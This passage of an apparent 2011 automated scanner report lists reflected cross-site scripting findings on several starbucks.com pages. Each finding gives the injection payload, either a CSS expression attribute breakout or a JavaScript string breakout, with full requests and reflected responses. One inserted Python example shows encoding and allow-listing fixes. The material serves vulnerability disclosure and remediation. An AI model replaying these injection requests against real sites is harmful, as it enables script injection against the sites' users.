The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f184b"style%3d"x%3aexpression(alert(1))"96125b2cebe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f184b"style="x:expression(alert(1))"96125b2cebe in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffeehouse/entertainment?f184b"style%3d"x%3aexpression(alert(1))"96125b2cebe=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:51 GMT
Connection: close
Content-Length: 54188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/entertainment?f184b"style="x:expression(alert(1))"96125b2cebe=1" />
...[SNIP]...

2.64. http://www.starbucks.com/coffeehouse/entertainment [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/entertainment

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90a4e"%3balert(1)//d2bb761e82e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 90a4e";alert(1)//d2bb761e82e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffeehouse/entertainment?90a4e"%3balert(1)//d2bb761e82e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:54 GMT
Connection: close
Content-Length: 54093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
pt">
   var flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "96861445001";
   flashvars.playerLocation = "http://www.starbucks.com/coffeehouse/entertainment?90a4e";alert(1)//d2bb761e82e=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...
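
The remediation note above says to keep user data out of script context; when the page URL must be emitted at all, it has to be rebuilt from trusted parts and then encoded for each sink. The following is an added example, not the site's code: it models the two sinks seen in 2.62 and 2.64 (the og:url meta attribute and the flashvars.playerLocation string), shows the unsafe concatenation, and contrasts it with a renderer that allow-lists parameter names and applies HTML attribute encoding and JavaScript string-literal encoding. The base URL, the allow-listed parameter names and the function names are assumptions made for the example.

```python
"""Rendering the request URL into an attribute and a JavaScript string: unsafe vs hardened.

Added example, not the site's code. It models the two sinks in the report (og:url
meta attribute, flashvars.playerLocation) and contrasts raw concatenation with an
allow-listed, context-encoded renderer. BASE_URL, ALLOWED_PARAMS and all function
names are assumptions made for the example.
"""
import html
import json
from urllib.parse import parse_qsl, unquote, urlencode

BASE_URL = "https://www.example.test"   # assumption: the site's canonical origin
ALLOWED_PARAMS = {"page", "lang"}        # assumption: query parameters the page really uses


def decoded_request_url(path: str, raw_query: str) -> str:
    """What a framework hands back when it stringifies the request URL: percent-decoded
    and unfiltered. This is the value both vulnerable sinks in the report echo verbatim."""
    return f"{BASE_URL}{path}?{unquote(raw_query)}" if raw_query else f"{BASE_URL}{path}"


def render_vulnerable(url: str) -> str:
    """Mirror of the report's sinks: the URL dropped into a double-quoted attribute
    and into a double-quoted JavaScript string with no encoding at all."""
    return (
        f'<meta property="og:url" content="{url}"/>\n'
        '<script type="text/javascript">\n'
        f'    flashvars.playerLocation = "{url}";\n'
        "</script>"
    )


def js_string_literal(value: str) -> str:
    """Serialize value as a JavaScript string literal. json.dumps escapes quotes,
    backslashes, control characters and non-ASCII (so U+2028/2029 too); the extra
    replacements stop '</script>' or an entity from being seen by the HTML parser first."""
    literal = json.dumps(value)
    return literal.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def render_encoded(url: str) -> str:
    """Same sinks, each with the encoding its context requires. Encoding alone defeats
    both payloads in the report, but still reflects whatever the client sent."""
    return (
        f'<meta property="og:url" content="{html.escape(url, quote=True)}"/>\n'
        '<script type="text/javascript">\n'
        f"    flashvars.playerLocation = {js_string_literal(url)};\n"
        "</script>"
    )


def canonical_url(path: str, raw_query: str) -> str:
    """Rebuild the URL from the route path plus allow-listed parameters only, so an
    unknown parameter name (the injection point in this report) never reaches output."""
    pairs = [(k, v) for k, v in parse_qsl(raw_query, keep_blank_values=True) if k in ALLOWED_PARAMS]
    query = urlencode(pairs)
    return f"{BASE_URL}{path}" + (f"?{query}" if query else "")


def render_hardened(path: str, raw_query: str) -> str:
    """Allow-list first, encode second: the fix the remediation note asks for."""
    return render_encoded(canonical_url(path, raw_query))


if __name__ == "__main__":
    # The raw query string from finding 2.64, exactly as the scanner sent it.
    path, raw_query = "/coffeehouse/entertainment", '90a4e"%3balert(1)//d2bb761e82e=1'
    print(render_vulnerable(decoded_request_url(path, raw_query)))
    print(render_encoded(decoded_request_url(path, raw_query)))
    print(render_hardened(path, raw_query))
```

The encoded-only renderer is the minimum fix; the allow-listing renderer is the one to ship, because a canonical URL has no business carrying parameter names the page does not recognise, and dropping them removes the injection point rather than just neutralising two known payloads.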

2.65. http://www.starbucks.com/coffeehouse/mobile-apps [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4131d"style%3d"x%3aexpression(alert(1))"c25fff327f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4131d"style="x:expression(alert(1))"c25fff327f9 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffeehouse/mobile-apps?4131d"style%3d"x%3aexpression(alert(1))"c25fff327f9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:56 GMT
Connection: close
Content-Length: 40635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps?4131d"style="x:expression(alert(1))"c25fff327f9=1"/>
...[SNIP]...

2.66. http://www.starbucks.com/coffeehouse/mobile-apps [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fa55"%3balert(1)//0b5e66ea4df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7fa55";alert(1)//0b5e66ea4df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffeehouse/mobile-apps?7fa55"%3balert(1)//0b5e66ea4df=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:57 GMT
Connection: close
Content-Length: 40540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
ript">
   var flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "96890007001";
   flashvars.playerLocation = "http://www.starbucks.com/coffeehouse/mobile-apps?7fa55";alert(1)//0b5e66ea4df=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.67. http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps/mystarbucks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae0f9"style%3d"x%3aexpression(alert(1))"6743e2ed601 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae0f9"style="x:expression(alert(1))"6743e2ed601 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffeehouse/mobile-apps/mystarbucks?ae0f9"style%3d"x%3aexpression(alert(1))"6743e2ed601=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:12:36 GMT
Connection: close
Content-Length: 37985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks?ae0f9"style="x:expression(alert(1))"6743e2ed601=1"/>
...[SNIP]...

2.68. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps/starbucks-card-mobile

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed19c"style%3d"x%3aexpression(alert(1))"695c8291744 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ed19c"style="x:expression(alert(1))"695c8291744 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffeehouse/mobile-apps/starbucks-card-mobile?ed19c"style%3d"x%3aexpression(alert(1))"695c8291744=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:12:30 GMT
Connection: close
Content-Length: 38490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile?ed19c"style="x:expression(alert(1))"695c8291744=1"/>
...[SNIP]...

2.69. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps/starbucks-card-mobile-bb

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21513"style%3d"x%3aexpression(alert(1))"30c5ed9534e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 21513"style="x:expression(alert(1))"30c5ed9534e in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffeehouse/mobile-apps/starbucks-card-mobile-bb?21513"style%3d"x%3aexpression(alert(1))"30c5ed9534e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:56 GMT
Connection: close
Content-Length: 39080

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb?21513"style="x:expression(alert(1))"30c5ed9534e=1"/>
...[SNIP]...

2.70. http://www.starbucks.com/coffeehouse/store-design [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/store-design

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5833a"style%3d"x%3aexpression(alert(1))"12718e18e54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5833a"style="x:expression(alert(1))"12718e18e54 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffeehouse/store-design?5833a"style%3d"x%3aexpression(alert(1))"12718e18e54=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:20 GMT
Connection: close
Content-Length: 43622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/store-design?5833a"style="x:expression(alert(1))"12718e18e54=1" />
...[SNIP]...

2.71. http://www.starbucks.com/coffeehouse/wireless-internet [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/wireless-internet

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a344c"style%3d"x%3aexpression(alert(1))"5d8d4bfdaf3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a344c"style="x:expression(alert(1))"5d8d4bfdaf3 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffeehouse/wireless-internet?a344c"style%3d"x%3aexpression(alert(1))"5d8d4bfdaf3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:38 GMT
Connection: close
Content-Length: 38028

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/wireless-internet?a344c"style="x:expression(alert(1))"5d8d4bfdaf3=1"/>
...[SNIP]...

2.72. http://www.starbucks.com/coffeehouse/wireless-internet/in-canada [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/wireless-internet/in-canada

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95eff"style%3d"x%3aexpression(alert(1))"52d652315b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 95eff"style="x:expression(alert(1))"52d652315b0 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffeehouse/wireless-internet/in-canada?95eff"style%3d"x%3aexpression(alert(1))"52d652315b0=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:53 GMT
Connection: close
Content-Length: 38308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/wireless-internet/in-canada?95eff"style="x:expression(alert(1))"52d652315b0=1"/>
...[SNIP]...

2.73. http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/wireless-internet/starbucks-digital-network

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db28c"style%3d"x%3aexpression(alert(1))"a963d7ce712 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as db28c"style="x:expression(alert(1))"a963d7ce712 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffeehouse/wireless-internet/starbucks-digital-network?db28c"style%3d"x%3aexpression(alert(1))"a963d7ce712=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:32 GMT
Connection: close
Content-Length: 38766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network?db28c"style="x:expression(alert(1))"a963d7ce712=1"/>
...[SNIP]...

2.74. http://www.starbucks.com/customer-service [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41c2f"style%3d"x%3aexpression(alert(1))"8870702513a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41c2f"style="x:expression(alert(1))"8870702513a in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /customer-service?41c2f"style%3d"x%3aexpression(alert(1))"8870702513a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:25:03 GMT
Connection: close
Content-Length: 34417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service?41c2f"style="x:expression(alert(1))"8870702513a=1"/>
...[SNIP]...

2.75. http://www.starbucks.com/customer-service/contact [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/contact

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 655a7"style%3d"x%3aexpression(alert(1))"cacda66d35a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 655a7"style="x:expression(alert(1))"cacda66d35a in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /customer-service/contact?655a7"style%3d"x%3aexpression(alert(1))"cacda66d35a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:58 GMT
Connection: close
Content-Length: 37233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/contact?655a7"style="x:expression(alert(1))"cacda66d35a=1"/>
...[SNIP]...

2.76. http://www.starbucks.com/customer-service/faqs/card [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
